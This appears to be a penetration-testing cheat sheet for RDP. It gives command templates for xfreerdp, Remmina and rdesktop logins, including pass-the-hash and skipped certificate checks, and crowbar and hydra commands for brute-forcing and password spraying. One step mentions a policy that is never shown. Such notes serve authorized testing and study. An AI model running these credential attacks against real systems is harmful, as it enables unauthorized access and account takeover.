PRIMARY CATEGORY → PROTOCOLS AND SERVICES
RDP → Remote Desktop Protocol
Ports
3389
Remote Connection
XFreeRDP
Password Auth
xfreerdp /u:<DOMAIN>\<USER> /p:<PASSWORD> /v:<TARGET>:<PORT>Pass The Hash
xfreerdp /u:<DOMAIN>\<USER> /pth:<NTHASH> /v:<TARGET>:<PORT>Due to certain account restrictions applied to the remote machine, an attacker may have to enable the following policy →
Skip Certificate Validation
xfreerdp /u:<USER> /p:<PASSWORD> /v:<TARGET>:<PORT> /cert:ignoreRemmina
CLI
remmina -c rdp://<USER>:<PASSWORD>@<TARGET>:<PORT>RDesktop
rdesktop -u <USER> <TARGET>
rdesktop -d <DOMAIN> -u <USER> -p <PASSWORWD> <TARGET>Bruteforcing || Password Spraying
Crowbar
Bruteforcing
- User ↔ Passwordlist
crowbar -b rdp -s <TARGET[s]> -u <USERNAME> -C <PASSWDLIST>- **Userlist ↔ Passwordlist
crowbar -b rdp -s <TARGET[s]> -U <USERLIST> -C <PASSWDLIST>Password Spraying
crowbar -b rdp -s <TARGET[s]> -U <USERLIST> -c '<PASSWORD>'Hydra
Bruteforcing
- User ↔ Passwordlist
hydra -T <THREADS> -l <USERNAME> -P <PASSWDLIST> rdp://<TARGET>- Userlist ↔ Passwordlist
hydra -T <THREADS> -L <USERLIST> -P <PASSWDLIST> rdp://<TARGET>Password Spraying
hydra -T <THREADS> -L <USERLIST> -p '<PASSWORD>' rdp://<TARGET>